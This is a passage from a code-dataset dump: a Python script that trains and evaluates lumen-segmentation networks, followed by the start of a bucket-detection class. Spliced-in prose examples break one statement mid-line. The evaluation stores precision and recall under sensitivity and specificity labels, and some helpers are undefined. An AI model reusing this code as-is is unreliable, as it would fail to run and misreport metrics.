sorted(glob(path_labels))\n    total_size_images = len(images)\n    total_size_labels = len(masks)\n    print('total size images:', total_size_images, path_images)\n    print('total size labels:', total_size_labels, path_labels)\n    return (images, masks)\n\n\ndef load_data_only_imgs(path):\n    print(path)\n    path_images = ''.join([path, \"/*\"])\n    images = sorted(glob(path_images))\n    total_size_images = len(images)\n    print('total size images:', total_size_images, path_images)\n    return (images, images)\n\n\ndef read_image(path):\n\n    path = path.decode()\n    x = cv2.imread(path, 1)\n    x = cv2.resize(x, (256, 256))\n    x = x/255.0\n    return x\n\n\ndef read_image_and_npy(path):\n    path = path.decode()\n    x_vol = np.load(path, allow_pickle=True)\n    x_vol = np.resize(x_vol, (3, 256, 256, 3))\n    x_vol = x_vol / 255.0\n    # x_vol is already scaled to [0, 1], so the frame must not be divided again\n    x_frame = cv2.resize(x_vol[0], (256, 256))\n\n    return x_vol, x_frame\n\n\ndef read_image_npy(path):\n    path = path.decode()\n    x = np.load(path, allow_pickle=True)\n    x = np.resize(x, (3, 256, 256, 3))\n    x = x / 255.0\n\n    return x\n\n\ndef read_mask(path):\n    path = path.decode()\n    x = cv2.imread(path)\n    x = cv2.cvtColor(x, cv2.COLOR_BGR2GRAY)\n    x = cv2.resize(x, (256, 256))\n    x = x/255.0\n    x = np.expand_dims(x, axis=-1)\n    return x\n\n\ndef tf_parse(x, y):\n    def _parse(x, y):\n        x = read_image(x)\n        y = read_mask(y)\n        return x, y\n\n    x, y = tf.numpy_function(_parse, [x, y], [tf.float64, tf.float64])\n    x.set_shape([256, 256, 3])\n    y.set_shape([256, 256, 1])\n    return x, y\n\n\ndef tf_parse_v2(x, y):\n    def _parse(x, y):\n        x = read_image_npy(x)\n        y = read_mask(y)\n        return x, y\n\n    x, y = tf.numpy_function(_parse, [x, y], [tf.float64, tf.float64])\n    x.set_shape([3, 256, 256, 3])\n    y.set_shape([256, 256, 1])\n    return x, y\n\n\ndef tf_parse_v3(x, y):\n    def _parse(x, y):\n        x_vol, x_frame = read_image_and_npy(x)\n        y = read_mask(y)\n\n        return x_vol, x_frame, y\n\n    x_vol, x_frame, y = tf.numpy_function(_parse, [x, y], [tf.float64, tf.float64, tf.float64])\n    x_vol.set_shape([3, 256, 256, 3])\n    x_frame.set_shape([256, 256, 3])\n    y.set_shape([256, 256, 1])\n    return (x_vol, x_frame), y\n\n\ndef tf_dataset(x, y, batch=8, img_modality='rgb'):\n    dataset = tf.data.Dataset.from_tensor_slices((x, y))\n\n    if img_modality == 'npy':\n        dataset = dataset.map(tf_parse_v2)\n    elif img_modality == 'ensemble':\n        dataset = dataset.map(tf_parse_v3)\n    else:\n        dataset = dataset.map(tf_parse)\n\n    dataset = dataset.batch(batch)\n    dataset = dataset.repeat()\n    return dataset\n\n\ndef iou(y_true, y_pred, smooth=1e-15):\n    def f(y_true, y_pred):\n        intersection = (y_true * y_pred).sum()\n        union = y_true.sum() + y_pred.sum() - intersection\n        x = (intersection + smooth) / (union + smooth)\n        x = x.astype(np.float32)\n        return x\n\n    return tf.numpy_function(f, [y_true, y_pred], tf.float32)\n\n\ndef dice_coef(y_true, y_pred, smooth=1):\n    intersection = K.sum(y_true * y_pred, axis=[1, 2, 3])\n    union = K.sum(y_true, axis=[1, 2, 3]) + K.sum(y_pred, axis=[1, 2, 3])\n    return K.mean((2. * intersection + smooth) / (union + smooth), axis=0)\n\n\ndef dice_coef_loss(y_true, y_pred):\n    return 1 - dice_coef(y_true, y_pred)\n\n\ndef build_model(model_name):\n\n    size = 256\n    num_filters = [16, 32, 48, 64]\n    # num_filters = [64, 48, 32, 16]\n    # num_filters = [64, 128, 256, 512]\n    inputs = Input((size, size, 3))\n\n    if model_name == 'ResUnet':\n        model = ResUnet.build_model()\n\n    elif model_name == 'Transpose_Unet':\n        model = Transpose_Unet.build_model()\n\n    elif model_name == 'Transpose_ResUnet':\n        model = Transpose_ResUnet.build_model()\n\n    elif model_name == 'Unet':\n        model = Unet.build_model()\n\n    elif model_name == 'continuous_blocks_ResUnet':\n        model = continuous_blocks_ResUnet.build()\n\n    elif model_name == 'simple_ensemble':\n        model = ensemble.build_model()\n\n    elif model_name == 'ensemble':\n        model = ensemble_2.build_model()\n\n    return model\n\n\ndef mask_parse(mask):\n    mask = np.squeeze(mask)\n    mask = [mask, mask, mask]\n    mask = np.transpose(mask, (1, 2, 0))\n    return mask\n\n\ndef read_image_test(path, img_modality='rgb'):\n    if img_modality == 'npy':\n        x = np.load(path, allow_pickle=True)\n        x = np.resize(x, (3, 256, 256, 3))\n        x = x / 255.0\n\n    elif img_modality == 'ensemble':\n        x_vol = np.load(path, allow_pickle=True)\n        x_vol = np.resize(x_vol, (3, 256, 256, 3))\n        x_vol = x_vol / 255.0\n        # the frame comes from the already-normalised volume\n        x_frame = cv2.resize(x_vol[0], (256, 256))\n        x = x_vol, x_frame\n\n    else:\n        x = cv2.imread(path, cv2.IMREAD_COLOR)\n        x = cv2.resize(x, (256, 256))\n        x = x / 255.0\n\n    return x\n\n\ndef read_mask_test(path):\n    x = cv2.imread(path, cv2.IMREAD_GRAYSCALE)\n    x = cv2.resize(x, (256, 256))\n    x = np.expand_dims(x, axis=-1)\n    return x\n\n\ndef get_mcc(groundtruth_list, predicted_list):\n    \"\"\"Return mcc covering edge cases\"\"\"\n\n    # NOTE: get_confusion_matrix_elements and the _all_class_* /\n    # _mcc_denominator_zero helpers are expected to be provided by another\n    # module; they are not defined in this file.\n    tn, fp, fn, tp = get_confusion_matrix_elements(groundtruth_list, predicted_list)\n\n    if _all_class_0_predicted_as_class_0(groundtruth_list, predicted_list) is True:\n        mcc = 1\n    elif _all_class_1_predicted_as_class_1(groundtruth_list, predicted_list) is True:\n        mcc = 1\n    elif _all_class_1_predicted_as_class_0(groundtruth_list, predicted_list) is True:\n        mcc = -1\n    elif _all_class_0_predicted_as_class_1(groundtruth_list, predicted_list) is True:\n        mcc = -1\n\n    elif _mcc_denominator_zero(tn, fp, fn, tp) is True:\n        mcc = -1\n\n    # Finally calculate MCC\n    else:\n        mcc = ((tp * tn) - (fp * fn)) / (\n            np.sqrt((tp + fp) * (tp + fn) * (tn + fp) * (tn + fn)))\n\n    return mcc\n\n\ndef get_confusion_matrix_intersection_mats(groundtruth, predicted):\n    \"\"\" Returns dict of 4 boolean numpy arrays with True at TP, FP, FN, TN\n    \"\"\"\n\n    confusion_matrix_arrs = {}\n\n    groundtruth_inverse = np.logical_not(groundtruth)\n    predicted_inverse = np.logical_not(predicted)\n\n    confusion_matrix_arrs['tp'] = np.logical_and(groundtruth, predicted)\n    confusion_matrix_arrs['tn'] = np.logical_and(groundtruth_inverse, predicted_inverse)\n    confusion_matrix_arrs['fp'] = np.logical_and(groundtruth_inverse, predicted)\n    confusion_matrix_arrs['fn'] = np.logical_and(groundtruth, predicted_inverse)\n\n    return confusion_matrix_arrs\n\n\ndef get_confusion_matrix_overlaid_mask(image, groundtruth, predicted, alpha, colors):\n    \"\"\"\n    Returns the 'image' overlaid with a color mask where TP, FP, FN, TN are\n    each a color given by the 'colors' dictionary\n    \"\"\"\n    image = cv2.cvtColor(image, cv2.COLOR_GRAY2RGB)\n    masks = get_confusion_matrix_intersection_mats(groundtruth, predicted)\n    color_mask = np.zeros_like(image)\n    for label, mask in masks.items():\n        color = colors[label]\n        mask_rgb = np.zeros_like(image)\n        mask_rgb[mask != 0] = color\n        color_mask += mask_rgb\n    return cv2.addWeighted(image, alpha, color_mask, 1 - alpha, 0)\n\n\ndef calculate_rates(image_1, image_2):\n    image_1 = np.asarray(image_1).astype(np.bool)\n    image_2 = np.asarray(image_2).astype(np.bool)\n    image_1 = image_1.flatten()\n    image_2 = image_2.flatten()\n\n    if image_1.shape != image_2.shape:\n        raise ValueError(\"Shape mismatch: im1 and im2 must have the same shape.\")\n\n    accuracy_value = accuracy_score(image_1, image_2)\n\n    if (np.unique(image_1) == [False]).all() and (np.unique(image_2) == [False]).all():\n        recall_value = 1.\n        precision_value = 1.\n\n    else:\n        recall_value = recall_score(image_1, image_2)\n        precision_value = average_precision_score(image_1, image_2)\n\n    return precision_value, recall_value, accuracy_value\n\n\ndef dice(im1, im2, smooth=0.001):\n    im1 = np.asarray(im1).astype(np.bool)\n    im2 = np.asarray(im2).astype(np.bool)\n\n    if im1.shape != im2.shape:\n        raise ValueError(\"Shape mismatch: im1 and im2 must have the same shape.\")\n\n    # Compute Dice coefficient\n    intersection = np.logical_and(im1, im2)\n    if (np.unique(im1) == [False]).all() and (np.unique(im2) == [False]).all():\n        dsc = 1.\n    else:\n        dsc = 2. * (intersection.sum() + smooth) / (im1.sum() + im2.sum() + smooth)\n\n    return dsc\n    # return 2. 
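
A tiny numpy check of the confusion-matrix masks defined above: with ground truth [1,1,0,0] and prediction [1,0,1,0], each of TP, TN, FP, FN contains exactly one pixel, and the Dice score comes out at 0.5:

    # Worked example of the TP/TN/FP/FN masks and the Dice formula above.
    import numpy as np

    gt_mask = np.array([1, 1, 0, 0], dtype=bool)
    pred = np.array([1, 0, 1, 0], dtype=bool)

    tp = np.logical_and(gt_mask, pred)        # [T, F, F, F]
    tn = np.logical_and(~gt_mask, ~pred)      # [F, F, F, T]
    fp = np.logical_and(~gt_mask, pred)       # [F, F, T, F]
    fn = np.logical_and(gt_mask, ~pred)       # [F, T, F, F]
    print(tp.sum(), tn.sum(), fp.sum(), fn.sum())   # 1 1 1 1

    dsc = 2 * tp.sum() / (gt_mask.sum() + pred.sum())
    print(dsc)                                      # 0.5
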
* (intersection.sum() + smooth) / (im1.sum() + im2.sum() + smooth)\n\n\ndef read_img(dir_image):\n    original_img = cv2.imread(dir_image)\n    img = cv2.resize(original_img, (256, 256))\n    img = img / 255\n    return img\n\n\ndef read_results_csv(file_path, row_id=0):\n    dice_values = []\n    with open(file_path, 'r') as file:\n        reader = csv.reader(file)\n        for row in reader:\n            dice_values.append(float(row[row_id]))\n\n    return dice_values\n\n\ndef evaluate_and_predict(model, directory_to_evaluate,\n                         image_modality, results_directory, output_name, new_results_id):\n\n    output_directory = 'predictions/' + output_name + '/'\n    batch_size = 8\n    print(image_modality)\n    (test_x, test_y) = load_data(directory_to_evaluate, image_modality)\n    test_dataset = tf_dataset(test_x, test_y, batch=batch_size,\n                              img_modality=image_modality)\n    test_steps = (len(test_x)//batch_size)\n\n    if len(test_x) % batch_size != 0:\n        test_steps += 1\n\n    # evaluate the model in the test dataset\n    model.evaluate(test_dataset, steps=test_steps)\n    times = []\n    for i, (x, y) in tqdm(enumerate(zip(test_x, test_y)), total=len(test_x)):\n        directory_image = x\n        init_time = time.time()\n        x = read_image_test(x, image_modality)\n        if image_modality == 'ensemble':\n            x_vol = np.expand_dims(x[0], axis=0)\n            x_frame = np.expand_dims(x[1], axis=0)\n            print(np.shape(x_vol))\n            print(np.shape(x_frame))\n            x = x_vol, x_frame\n        else:\n            x = np.expand_dims(x, axis=0)\n\n        y_pred = model.predict(x)[0] > 0.5\n        delta = time.time() - init_time\n        times.append(delta)\n        name_original_file = directory_image.replace(''.join([directory_to_evaluate, 'image/']), '')\n\n        if image_modality == 'npy' or image_modality == 'ensemble':\n            name_original_file = name_original_file.replace('.npy', '.png')\n        results_name = ''.join([results_directory, output_directory, name_original_file])\n        cv2.imwrite(results_name, y_pred * 255.0)\n\n    # save the results of the test dataset in a CSV file\n    ground_truth_imgs_dir = directory_to_evaluate + 'image/'\n    ground_truth_labels_dir = directory_to_evaluate + 'label/'\n    result_mask_dir = results_directory + output_directory\n\n    ground_truth_image_list = [file for file in os.listdir(ground_truth_imgs_dir) if\n                               os.path.isfile(os.path.join(ground_truth_imgs_dir, file))]\n    results_image_list = [file for file in os.listdir(result_mask_dir) if os.path.isfile(\n        os.path.join(result_mask_dir, file))]\n    results_dice = []\n    results_sensitivity = []\n    results_specificity = []\n    results_accuracy = []\n\n    for image in ground_truth_image_list[:]:\n        candidates = [name for name in results_image_list if image[:-4] == name[:-4]]\n        if candidates:\n            result_image = candidates[0]\n            image_name = image[:-4]\n            original_mask = read_img(''.join([ground_truth_labels_dir, image_name, '.png']))\n            predicted_mask = read_img(''.join([result_mask_dir, result_image]))\n            dice_val = dice(original_mask, predicted_mask)\n            results_dice.append(dice_val)\n            # calculate_rates returns (precision, recall, accuracy)\n            sensitivity, specificity, accuracy = calculate_rates(original_mask, predicted_mask)\n            results_sensitivity.append(sensitivity)\n            results_specificity.append(specificity)\n            results_accuracy.append(accuracy)\n\n        else:\n            print(image, 'not found in results list')\n\n    name_test_csv_file = ''.join([results_directory, 'results_evaluation_',\n                                  output_name,\n                                  '_',\n                                  new_results_id,\n                                  '_.csv'])\n\n    with open(name_test_csv_file, mode='w') as results_file:\n        results_file_writer = csv.writer(results_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n        for i, file in enumerate(ground_truth_image_list):\n            results_file_writer.writerow(\n                [str(i), file, results_dice[i],\n                 results_sensitivity[i],\n                 results_specificity[i],\n                 results_accuracy[i]])\n\n    print('Average inference times and std:')\n    print(np.average(times), np.std(times))\n    return name_test_csv_file\n\n\ndef paint_imgs(img, mask):\n\n    if np.shape(img) != np.shape(mask):\n        img = cv2.resize(img, (np.shape(mask)[0], np.shape(mask)[1]))\n\n    for i in range(np.shape(mask)[0]):\n        for j in range(np.shape(mask)[1]):\n            if mask[i, j, 0] == True:\n                img[i, j, 1] = 100\n\n    return img\n\n\ndef clean_mask(mask):\n\n    mask = cv2.cvtColor(mask, cv2.COLOR_BGR2GRAY)\n    u8 = mask.astype(np.uint8)\n    # remove the small areas appearing in the image if there is a considerable big one\n    areas = []\n    remove_small_areas = False\n    contours, hierarchy = cv2.findContours(u8,\n                                           cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n    for contour in contours:\n        areas.append(cv2.contourArea(contour))\n\n    if len(contours) > 1:\n        # sort the areas from bigger to smaller\n        sorted_areas = sorted(areas, reverse=True)\n        index_remove = np.ones(len(areas))\n        for i in range(len(sorted_areas)-1):\n            # if an area is 1/4 smaller than the bigger area, mark to remove\n            if sorted_areas[i+1] < 0.15 * sorted_areas[0]:\n                index_remove[areas.index(sorted_areas[i+1])] = 0\n                remove_small_areas = True\n\n    if remove_small_areas is True:\n        #new_mask = np.zeros((w, d))\n        new_mask = copy.copy(mask)\n        for index, remove in enumerate(index_remove):\n            if remove == 0:\n                # replace the small areas with 0\n                cv2.drawContours(new_mask, contours, index, (0, 0, 0), -1)  # as opencv stores in BGR format\n    else:\n        new_mask = mask\n\n    return new_mask\n\n\ndef save_history(name_performance_metrics_file, model_history):\n\n    with open(name_performance_metrics_file, mode='w') as results_file:\n        results_file_writer = csv.writer(results_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n        list_keys = [str(item) for item in model_history.history.keys()]\n        list_keys.insert(0, 'epoch')\n        results_file_writer.writerow(list_keys)\n        for i, element in enumerate(model_history.history['loss']):\n            results_file_writer.writerow([str(i), element,\n                                          model_history.history[list_keys[2]][i],\n                                          model_history.history[list_keys[3]][i],\n                                          model_history.history[list_keys[4]][i],\n                                          model_history.history[list_keys[5]][i],\n                                          model_history.history[list_keys[6]][i],\n                                          model_history.history[list_keys[7]][i],\n                                          model_history.history[list_keys[8]][i],\n                                          model_history.history[list_keys[9]][i],\n                                          model_history.history[list_keys[10]][i],\n                                          model_history.history[list_keys[11]][i],\n                                          model_history.history[list_keys[12]][i],\n                                          model_history.history[list_keys[13]][i]])\n\n\ndef save_plots(model_history, results_directory, new_results_id):\n\n    # summarize history for DSC\n    plt.figure()\n    plt.plot(model_history.history['dice_coef'], '-o')\n    plt.plot(model_history.history['val_dice_coef'], '-o')\n    plt.title('model DSC history')\n    plt.ylabel('DSC')\n    plt.xlabel('epoch')\n    plt.legend(['train', 'val'], loc='upper left')\n    plt.savefig(''.join([results_directory, 'DSC_history_', new_results_id, '_.svg']))\n    plt.close()\n\n    # summarize history for accuracy\n    plt.figure()\n    plt.plot(model_history.history['acc'])\n    plt.plot(model_history.history['val_acc'])\n    plt.title('model accuracy history')\n    plt.ylabel('accuracy')\n    plt.xlabel('epoch')\n    plt.legend(['train', 'val'], loc='upper left')\n    plt.savefig(''.join([results_directory, 'Accuracy_history_', new_results_id, '_.svg']))\n    plt.close()\n\n    # summarize history for loss\n    plt.figure()\n    plt.plot(model_history.history['loss'], '-o')\n    plt.plot(model_history.history['val_loss'], '-o')\n    plt.title('model loss history')\n    plt.ylabel('DSC loss')\n    plt.xlabel('epoch')\n    plt.legend(['train', 'val'], loc='upper left')\n    plt.savefig(''.join([results_directory, 'DSC_loss_history_', new_results_id, '_.svg']))\n    plt.close()\n\n    print('Plots of the history saved at:', results_directory)\n\n\ndef main(project_folder, name_model, batch, lr):\n    epochs = 950\n    # optimizer:\n    opt = tf.keras.optimizers.Adam(lr)\n\n    # image modality of the data\n    image_modality = 'rgb'\n    augmented = True\n    if augmented is True:\n        amount_data = '/augmented_data/'\n    else:\n        amount_data = '/original_data/'\n\n    # Define training and validation data\n    train_data_used = ''.join([project_folder, 'train', amount_data])\n    val_data_used = ''.join([project_folder, 'val', amount_data])\n\n    if name_model == 'continuous_blocks_ResUnet':\n        image_modality = 'npy'\n        amount_data = '/original_data/'\n        train_data_used = ''.join([project_folder, 'volume_data/', str(3), '_continuous_frames/',\n                                   'train', amount_data])\n        val_data_used = ''.join([project_folder, 'volume_data/', str(3), '_continuous_frames/',\n                                 'val', amount_data])\n    elif name_model == 'simple_ensemble' or name_model == 'ensemble':\n        image_modality = 'ensemble'\n        amount_data = '/original_data/'\n        train_data_used = ''.join([project_folder, 'volume_data/', str(3), '_continuous_frames/',\n                                   'train', amount_data])\n        val_data_used = ''.join([project_folder, 'volume_data/', str(3), '_continuous_frames/',\n                                 'val', amount_data])\n\n\n\n    (train_x, train_y) = load_data(train_data_used, image_modality)\n    print('Data training: ', train_data_used)\n\n    (valid_x, valid_y) = load_data(val_data_used, image_modality)\n    print('Data validation: ', val_data_used)\n\n    train_dataset = tf_dataset(train_x, train_y, batch=batch,\n                               img_modality=image_modality)\n    valid_dataset = tf_dataset(valid_x, valid_y, batch=batch,\n                               img_modality=image_modality)\n\n    # metrics list:\n    metrics = [\"acc\", tf.keras.metrics.Recall(),\n               tf.keras.metrics.Precision(), dice_coef, iou]\n\n    model = build_model(name_model)\n    model.summary()\n    model.compile(optimizer=opt, loss=dice_coef_loss, metrics=metrics)\n    training_starting_time = datetime.datetime.now()\n\n    # determine whether to also analyse the training and validation datasets\n    analyze_validation_set = False\n    evaluate_train_dir = False\n    # ID name for the folder and results\n\n    new_results_id = ''.join([name_model,\n                              '_lr_',\n                              str(lr),\n                              '_bs_',\n                              str(batch),\n                              '_', image_modality, '_',\n                              training_starting_time.strftime(\"%d_%m_%Y_%H_%M\"),\n                              ])\n    results_directory = ''.join([project_folder, 
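
The train_steps/valid_steps arithmetic used below is plain ceiling division; a quick check of the equivalence:

    # The floor-divide-then-bump idiom below equals math.ceil(n / batch).
    import math
    n_samples, batch = 103, 8
    steps = n_samples // batch
    if n_samples % batch != 0:
        steps += 1
    assert steps == math.ceil(n_samples / batch) == 13
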
'results/', name_model,\n                                 '/', new_results_id, '/'])\n    # if the results directory doesn't exist, create it (with its parents)\n    if not os.path.isdir(results_directory):\n        os.makedirs(results_directory)\n\n    callbacks = [\n        ModelCheckpoint(results_directory + new_results_id + \"_model.h5\"),\n        ReduceLROnPlateau(monitor='val_loss', factor=0.1, patience=10),\n        CSVLogger(results_directory + new_results_id + \"_data.csv\"),\n        TensorBoard(),\n        EarlyStopping(monitor='val_loss', patience=15, restore_best_weights=True)]\n\n    train_steps = len(train_x) // batch\n    valid_steps = len(valid_x) // batch\n\n    if len(train_x) % batch != 0:\n        train_steps += 1\n    if len(valid_x) % batch != 0:\n        valid_steps += 1\n\n    start_time = datetime.datetime.now()\n\n    # Train the network\n    model_history = model.fit(train_dataset,\n                              validation_data=valid_dataset,\n                              epochs=epochs,\n                              steps_per_epoch=train_steps,\n                              validation_steps=valid_steps,\n                              callbacks=callbacks)\n    # save the model\n    model.save(results_directory + new_results_id + '_model')\n    print('Total Training TIME:', (datetime.datetime.now() - start_time))\n    print('METRICS Considered:')\n    print(model_history.history.keys())\n\n    name_performance_metrics_file = ''.join([results_directory,\n                                             'performance_metrics_',\n                                             training_starting_time.strftime(\"%d_%m_%Y_%H_%M\"),\n                                             '_.csv'])\n\n    save_history(name_performance_metrics_file, model_history)\n    save_plots(model_history, results_directory, new_results_id)\n    # make directory for the predictions\n    os.mkdir(results_directory + 'predictions/')\n    # Evaluate and predict in the test dataset(s)\n    list_of_test_sets = sorted(os.listdir(project_folder + 'test/'))\n\n    names_csv_files = []\n    for folder in list_of_test_sets:\n        os.mkdir(''.join([results_directory, 'predictions/', folder, '/']))\n        if image_modality == 'npy' or image_modality == 'ensemble':\n            evaluation_directory = ''.join([project_folder, 'volume_data/', str(3), '_continuous_frames/',\n                                            'test/', folder, '/'])\n        else:\n            evaluation_directory = ''.join([project_folder, 'test/', folder, '/'])\n        name_test_csv_file = evaluate_and_predict(model, evaluation_directory,\n                                                  image_modality,\n                                                  results_directory, folder, new_results_id)\n        names_csv_files.append(name_test_csv_file)\n\n    if analyze_validation_set is True:\n        os.mkdir(results_directory + 'predictions/val/')\n        if image_modality == 'npy' or image_modality == 'ensemble':\n            evaluation_directory_val = ''.join([project_folder, 'volume_data/', str(3), '_continuous_frames/',\n                                                'val/original_data/'])\n        else:\n            evaluation_directory_val = project_folder + \"val/original_data/\"\n        name_test_csv_file = evaluate_and_predict(model, evaluation_directory_val,\n                                                  image_modality, results_directory,\n                                                  'val', new_results_id)\n\n    if evaluate_train_dir is True:\n        os.mkdir(results_directory + 'predictions/train/')\n        if image_modality == 'npy' or image_modality == 'ensemble':\n            evaluation_directory_val = ''.join([project_folder, 'volume_data/', str(3), '_continuous_frames/',\n                                                'train/original_data/'])\n        else:\n            evaluation_directory_val = project_folder + \"train/original_data/\"\n        name_test_csv_file = evaluate_and_predict(model, evaluation_directory_val,\n                                                  image_modality, results_directory,\n                                                  'train', new_results_id)\n\n\nif __name__ == \"__main__\":\n\n    project_folder = '/home/nearlab/Jorge/current_work/lumen_segmentation/data/phantom_lumen/'\n    name_models = ['ensemble']\n    # Hyper-parameters:\n    batches = [4]\n    learning_rates = [1e-3, 1e-4, 1e-5]\n    for name_model in name_models:\n        for batch in batches:\n            for lr in learning_rates:\n                main(project_folder, name_model, batch, 
lr)\n\n\n\n","sub_path":"models/call_models.py","file_name":"call_models.py","file_ext":"py","file_size_in_byte":26764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"551480185","text":"import logging, cv2, json\nimport numpy as np\nfrom detectors.BoxDetector import BoxDetector\nfrom detectors.RoiDelineator import RoiDelineator\nimport utils.FMDLAlgoUtils as utils\nimport utils.visualizationUtils as visUtils\nfrom utils.config import Config\n\n\nINITIAL_NEGATIVE_NUMBER = -1\n\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.DEBUG)\n\n\n\nclass FMDLData:\n expected_configs = [\n # (config_name, lower bound, upper bound)\n ('measuredBucketWidthCM', 10, 100000, 'float'),\n ('boxDetectorScoreThresholdBucket', 0, 1, 'float'),\n ('boxDetectorScoreThresholdMatInside', 0, 1, 'float'),\n ('boxDetectorScoreThresholdCase', 0, 1, 'float'),\n ('roiDelineatorScoreThreshold', 0, 1, 'float'),\n ('minContourArea', 10, 100000, 'integer'),\n ('closingKernelSize', 1, 20, 'integer'),\n ('closingIterations', 0, 20, 'integer'),\n ('erosionKernelSize', 1, 20, 'integer'),\n ('erosionIterations', 0, 20, 'integer'),\n ('roiBoundaryPointsReductionFactor', 0.001, 0.1, 'float'),\n ('minObjectsRequired',[ [[]], [['bucket']], [['matInside']], [['matInside', 'bucket']],\\\n [['bucket', 'matInside']] ]),\n ('minBoundingBoxAspectRatio', 0.1, 10, 'float'),\n ('maxBoundingBoxAspectRatio', 0.1, 10, 'float'),\n ('intersectingRoiMaxIterations', 0, 100, 'integer'),\n ('intersectingRoiStepSize', 0.00001, 0.1, 'float'),\n ('effectiveWidthYcoordMultiplier', 0, 1, 'float'),\n ('maxDiffBetweenAbsBucketEdgeSlopes', 0, 100, 'float'),\n ]\n\n def __init__(self, debugMode=False):\n self.debugMode = debugMode\n self.initAllData()\n\n\n\n def initAllData(self):\n self.initAlgorithmInputsData()\n self.initAlgorithmOutputData()\n self.initAlgorithmIntermidiateData()\n\n\n\n def initAlgorithmInputsData(self):\n self.config = []\n self.input_image_np = []\n self.is_valid_image = False\n \n\n\n def initAlgorithmOutputData(self):\n global INITIAL_NEGATIVE_NUMBER\n\n self.imageWidthPx = INITIAL_NEGATIVE_NUMBER\n self.imageHeightPx = INITIAL_NEGATIVE_NUMBER\n self.pixel2CM_conversion_factor = INITIAL_NEGATIVE_NUMBER\n self.bucketWidthPX = INITIAL_NEGATIVE_NUMBER\n self.debug_info = []\n\n self.valid = False\n self.bucketValid = False\n self.matInsideValid = False\n self.effectiveWidthValid = False\n\n self.approximated_roi_boundary_2D = np.empty([], dtype=int)\n self.bucketBox = np.empty([], dtype=int)\n self.matInsideBox = np.empty([], dtype=int)\n self.bucketLeftLine = np.empty([], dtype=int)\n self.bucketRightLine = np.empty([], dtype=int)\n self.bucketMidLine = np.empty([], dtype=int)\n self.bucketWidthPointsXCord = np.empty([], dtype=int)\n\n\n\n def clearOutputData(self):\n global INITIAL_NEGATIVE_NUMBER\n\n self.imageWidthPx = INITIAL_NEGATIVE_NUMBER\n self.imageHeightPx = INITIAL_NEGATIVE_NUMBER\n self.pixel2CM_conversion_factor = INITIAL_NEGATIVE_NUMBER\n self.bucketWidthPX = INITIAL_NEGATIVE_NUMBER\n self.debug_info = []\n\n self.valid = False\n self.bucketValid = False\n self.matInsideValid = False\n self.effectiveWidthValid = False\n\n self.approximated_roi_boundary_2D = []\n self.bucketBox = []\n self.matInsideBox = []\n self.bucketLeftLine = []\n self.bucketRightLine = []\n self.bucketMidLine = []\n self.bucketWidthPointsXCord = []\n\n\n def initAlgorithmIntermidiateData(self):\n global INITIAL_NEGATIVE_NUMBER\n\n 
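
expected_configs above pairs each numeric config name with bounds and a type, or with a list of allowed values; utils.config.Config (not shown in this file) presumably validates against it. A hedged sketch of such a check; missing_or_invalid and its exact semantics are assumptions, not the real implementation:

    # Hypothetical validator over (name, low, high, kind) / (name, allowed)
    # entries, in the spirit of expected_configs above.
    def missing_or_invalid(config, expected):
        bad = []
        for entry in expected:
            name = entry[0]
            if name not in config:
                bad.append(name)
            elif len(entry) == 4:
                _, low, high, _ = entry
                if not (low <= config[name] <= high):
                    bad.append(name)
            elif config[name] not in entry[1]:
                bad.append(name)
        return bad

    print(missing_or_invalid({'measuredBucketWidthCM': 5},
                             [('measuredBucketWidthCM', 10, 100000, 'float')]))
    # ['measuredBucketWidthCM']  -> present but out of range
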
self.bucketBoundary = ()\n self.bucketScore = INITIAL_NEGATIVE_NUMBER\n self.matInsideBoundary = ()\n self.matInsideScore = INITIAL_NEGATIVE_NUMBER\n self.bestBoundary = ()\n\n self.caseScore = INITIAL_NEGATIVE_NUMBER\n self.caseBoundary = ()\n self.bucketLeftEdge = ()\n self.bucketRightEdge = ()\n self.bucketMidEdge = ()\n \n self.input_image_np_cropped = []\n self.roi_roidDelineatorSize = []\n self.roi_actualSize = []\n self.postProcessed_roi_actualSize = []\n self.roi_boundary_contour = np.empty([], dtype=int)\n self.approximated_roi_boundary = []\n \n \n\n def load_image(self, input_image):\n self.is_valid_image, self.input_image_np, self.imageWidthPx, self.imageHeightPx =\\\n utils.loadBytearrayImageIntoNp(input_image)\n\n\n\n def as_dict(self, debug = False):\n data_dict = {\n 'valid': self.valid,\n 'pixel2CM_conversion_factor': self.pixel2CM_conversion_factor,\n 'detected_bucketWidth_inPixels': self.bucketWidthPX,\n 'imageWidthPx': self.imageWidthPx,\n 'imageHeightPx': self.imageHeightPx,\n 'bucket_valid': self.bucketValid,\n 'matInside_valid': self.matInsideValid,\n 'effective_width_calculations_valid': self.effectiveWidthValid,\n 'approximated_roi_boundary': utils.getNumpyAsList(self.approximated_roi_boundary_2D, 'approximated_roi_boundary_2D'),\n 'approximated_bucket_box': utils.getNumpyAsList(self.bucketBox, 'bucketBox'),\n 'approximated_matInside_box': utils.getNumpyAsList(self.matInsideBox, 'matInsideBox'),\n 'approximated_bucket_left_line': utils.getNumpyAsList(self.bucketLeftLine, 'bucketLeftLine'),\n 'approximated_bucket_right_line': utils.getNumpyAsList(self.bucketRightLine, 'bucketRightLine'),\n 'approximated_bucket_mid_line': utils.getNumpyAsList(self.bucketMidLine, 'bucketMidLine'),\n 'bucketWidthPoints': utils.getNumpyAsList(self.bucketWidthPointsXCord, 'bucketWidthPointsXCord'),\n }\n\n if (debug):\n data_dict['debug'] = self.debug_info\n\n return data_dict\n\n\n\n\nclass FMDLAlgo:\n\n def __init__(self, boxDetectorNetworkPath, roiDelineatorNetworkPath, debugMode=False):\n self.logger = logging.getLogger(__name__)\n self.data = FMDLData(debugMode)\n\n if self.data.debugMode:\n self.logger.setLevel(logging.DEBUG)\n\n try:\n self.boxDetector = BoxDetector(boxDetectorNetworkPath)\n except utils.NetworkLoadException:\n self.logger.exception(\"Could not load the specified boxDetector network,\"\\\n \" you provided:\\n%s\\n\\n\", boxDetectorNetworkPath)\n raise utils.NetworkLoadException(boxDetectorNetworkPath)\n\n try:\n self.roiDelineator = RoiDelineator(roiDelineatorNetworkPath)\n except utils.NetworkLoadException:\n self.logger.exception(\"Could not load the specified roiDelineator network,\"\\\n \" you provided:\\n%s\\n\\n\", roiDelineatorNetworkPath)\n raise utils.NetworkLoadException(roiDelineatorNetworkPath)\n\n\n def 